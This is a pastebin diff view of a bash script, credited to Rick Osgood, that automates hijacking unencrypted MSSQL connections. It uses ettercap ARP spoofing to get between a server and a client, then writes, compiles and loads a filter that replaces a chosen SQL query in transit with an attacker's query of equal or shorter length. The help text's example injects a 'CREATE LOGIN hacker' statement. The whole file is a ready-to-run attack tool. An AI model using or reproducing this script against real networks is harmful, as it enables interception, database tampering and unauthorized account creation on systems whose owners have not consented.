View difference between Paste ID: tfR5836A and Nge9rx7g
SHOW: | | - or go back to the newest paste.
1
#!/bin/bash
2
#
3
####################################################################
4
#
5
# Written by Rick Osgood
6
#
7
# This script is designed to automate the process of hijacking an
8
# MSSQL database connection. This script can be used to perform a
9
# MITM attack between two IP addresses using ettercap and ARP
10
# spoofing. You also submit an original SQL query and a new SQL
11
# query. The script will create, compile, and load an ettercap
12
# filter to replace the original SQL string with your new one.
13
# This should work on any MSSQL conncetion that is not encrypted.
14
#
15
####################################################################
16
17
args=("$@") #array to store command line arguments
18
19
# Set variable defalts
20
SqlPort=1433 
21
ServerIP="NULL"
22
ClientIP="NULL"
23
FileName="NULL"
24
25
# Help function
26
print_help(){
27
        echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP] 
28
-c [SQL Client IP]"
29
        echo ""
30
        echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L
31
OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"
32
        echo ""
33
        echo "This script creates an ettercap filter that will identify a SQL string"
34
        echo "and replace it with a new string. The script will then compile the filter"
35
        echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
36
        echo "spoofing attack against the specified IP addresses automatically. All you"
37
        echo "have to do is sit back and wait for the original query to be submitted."
38
        echo ""
39
        echo " --help"
40
        echo "     Show this message."
41
        echo " -o"
42
        echo "     Specify the original SQL string to be replaced."
43
        echo " -i"
44
        echo "     Specify the new SQL string to be injected. This string must not"
45
        echo "     longer than the original query string."
46
        echo " -s"
47
        echo "     Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"
48
        echo " -c"
49
        echo "     Specify the SQL cient IP for ARP poison attack."
50
        echo " -f"
51
        echo "     Specify the output filename for the ettercap filter."
52
        echo " -p"
53
        echo "     Optional. Specifiy the MSSQL traffic port. Defaults to 1433."
54
}
55
56
# If not enough arguments then quit
57
if [ $# -lt "4" ]; then
58
        print_help
59
        exit 1
60
fi
61
62
COUNTER=0 #Count from zero to number of arguments
63
while [ $COUNTER -lt $# ]; do
64
        if [ "${args[$COUNTER]}" == "--help" ]; then
65
                print_help
66
                exit 0
67
68
        elif [ "${args[$COUNTER]}" == "-o" ]; then
69
                COUNTER=$(($COUNTER+1))
70
                OldQuery=${args[$COUNTER]}
71
72
        elif [ "${args[$COUNTER]}" == "-i" ]; then
73
                COUNTER=$((COUNTER+1))
74
                NewQuery=${args[$COUNTER]}
75
76
        elif [ "${args[$COUNTER]}" == "-s" ]; then
77
                COUNTER=$((COUNTER+1))
78
                ServerIP=${args[$COUNTER]}
79
80
        elif [ "${args[$COUNTER]}" == "-c" ]; then
81
                COUNTER=$((COUNTER+1))
82
                ClientIP=${args[$COUNTER]}
83
84
        elif [ "${args[$COUNTER]}" == "-f" ]; then
85
                COUNTER=$((COUNTER+1))
86
                FileName=${args[$COUNTER]}
87
88
        elif [ "${args[$COUNTER]}" == "-p" ]; then
89
                COUNTER=$((COUNTER+1))
90
                SqlPort=${args[$COUNTER]}
91
92
        else
93
                echo "Error: Unknown argument \"${args[$COUNTER]}\""
94
                echo ""
95
                print_help
96
                exit 1
97
        fi
98
99
        COUNTER=$(($COUNTER+1))
100
done;
101
102
# Is anything missing?
103
if [ "$ServerIP" == "NULL" ]; then
104
        echo "You must specify server IP!"
105
        exit 1
106
107
elif [ "$ClientIP" == "NULL" ]; then
108
        echo "You must specify client IP!"
109
        exit 1
110
111
elif [ "$FileName" == "NULL" ]; then
112
        echo "You must specify the file name for the ettercap filter!"
113
        exit 1
114
fi
115
116
# Calculate length of injected SQL query
117
length2=`echo $NewQuery | wc -m`
118
length2=$((length2 - 1))
119
echo "New string is $length2 bytes"
120
121
# Calculate length of original SQL query
122
length1=`echo $OldQuery | wc -m`
123
length1=$((length1 - 1))
124
echo "Original string is $length1 bytes"
125
126
# What's the difference?
127
difference=$((length1 - length2))
128
echo "Difference is $difference bytes"
129
130
# If the new string is too long it won't work
131
if [ $difference -lt 0 ]; then
132
        echo ""
133
        echo "New SQL query is longer than original! Quitting..."
134
        exit 0
135
fi
136
137
temp=""
138
for i in `seq 1 $difference`;
139
do
140
        temp="$temp "
141
done
142
PaddedQuery="$NewQuery$temp"
143
echo "PaddedQuery is \"$PaddedQuery\""
144
echo ""
145
146
IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces
147
148
echo "Converting original query to hex..."
149
# Convert original query to hex string with NULL padding (How it appears over the wire)
150
OldQueryHex=""
151
for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')
152
do
153
        OldQueryHex="$OldQueryHex\x"
154
        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
155
        OldQueryHex="$OldQueryHex$temp"
156
        OldQueryHex="$OldQueryHex\x00"
157
done
158
159
echo "Converting new query to hex..."
160
# Convert new query to hex string now.
161
NewQueryHex=""
162
for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')
163
do
164
        NewQueryHex="$NewQueryHex\x"
165
        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
166
        NewQueryHex="$NewQueryHex$temp" 
167
        NewQueryHex="$NewQueryHex\x00"
168
done
169
170
echo "Writing ettercap filter now..."
171
172
# Start writing actual ettercap filter file
173
echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
174
echo "       msg(\"SQL traffic discovered\");" >> $FileName
175
echo "       if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
176
echo "              msg(\"Found our string!\");" >> $FileName
177
echo "              replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName
178
echo "              msg(\"...and replaced it :)\");" >> $FileName
179
echo "       }" >> $FileName
180
echo "}" >> $FileName
181
182
# Exeute etterfilter to create the compiled filter
183
etterfilter $FileName -o $FileName.ef
184
185
# Execute ettercap and load the filter
186
ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//
187
188
echo ""
189
echo "Completed Successfully!"